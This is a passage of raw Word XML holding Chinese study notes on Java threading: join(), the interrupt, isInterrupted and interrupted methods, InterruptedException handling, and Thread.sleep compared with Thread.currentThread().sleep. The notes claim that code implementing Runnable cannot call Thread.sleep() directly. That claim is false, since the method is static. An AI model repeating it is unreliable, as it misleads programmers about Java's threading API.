          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="519" name="图片 107"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http://www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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wait(delay);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28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="520" name="图片 108"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http://www.blogjava.net/Images/OutliningIndicators/InBlock.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"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now = System.currentTimeMillis() - base;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29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="521" name="图片 109" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="522" name="图片 110" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEn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http://www.blogjava.net/Images/OutliningIndicators/ExpandedSubBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"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31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="103505" cy="151130"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="523" name="图片 111" descr="http://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEn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ttp://www.blogjava.net/Images/OutliningIndicators/ExpandedBlockEnd.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"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 </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 </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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>单纯从代码上看，如果线程被生成了，但还未被起动，调用它的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>join()</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3CD0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>方法是没有作用的。将直接继续向下执行，这里就不写代码验证了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62"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p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00F41A4C" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070083A">
        <w:t>interrupt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法作用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086263">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Java的Thread类中有三个方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，它有三个常见的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interrupt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:设置线程的中断状态，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8298B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interrupt()方法不能中断正在运行过程中的线程，只能中断</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B1B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>阻塞过程中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F8298B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>的线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(2)isInterrupted:线程是否中断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="006132B1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interrupted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:返回线程的上次中断状态，并清除中断状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A1D0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>阻塞函数，如：Thread.sleep、Thread.join、Object.wait等在检查到线程的中断状态时，</w:t>
      </w:r>
      <w:r w:rsidRPr="005A1D0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>会抛出InterruptedException，同时会清除线程的中断状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="008A3BCF" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3BCF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>对于InterruptedException的处理，可以有两种情况：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="008A3BCF" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3BCF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（1）外层代码可以处理这个异常，直接抛出这个异常即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A3BCF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>（2）如果不能抛出这个异常，比如在run()方法内，因为在得到这个异常的同时，线程的中断状态已经被清除了，需要保留线程的中断状态，则需要调用Thread.currentThread().interrupt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006132B1">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Thread.interrupted()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>库的源代码中比较常用，因为它既可以得到上一次线程的中断标志值，又可以同时清除线程的中断标志，一举两得，但同时也有坏处，就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF52B3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个函数有清除中断状态的副作用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，不容易理解</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="008A3BCF" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="00F41A4C" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thread.sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thread.currentThread.sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="003B6ABB" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>线程可以用继承Thread类或者实现Runnable接口来实现.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="003B6ABB" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread.sleep()是Thread类的方法,只对当前线程起作用,睡眠一段时间.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRPr="003B6ABB" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6F6A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>果线程是通过继承Thread实现的话这2个方法没有区别</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0078034F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>如果线程是通过实现Runnable接口来实现的</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,则不是Thread类,不能直接使用Thread.sleep()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="003B6ABB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>必须使用Thread.currentThread()来得到当前线程的引用才可以调用sleep(),所以要用Thread.currentThread().sleep()来睡眠</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00726C62" w:rsidRDefault="00726C62" w:rsidP="00726C62">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:after="125" w:line="244" w:lineRule="atLeast"/>
        <w:ind w:firstLine="250"/>
        <w:jc w:val="left"/>
        <w:rPr>
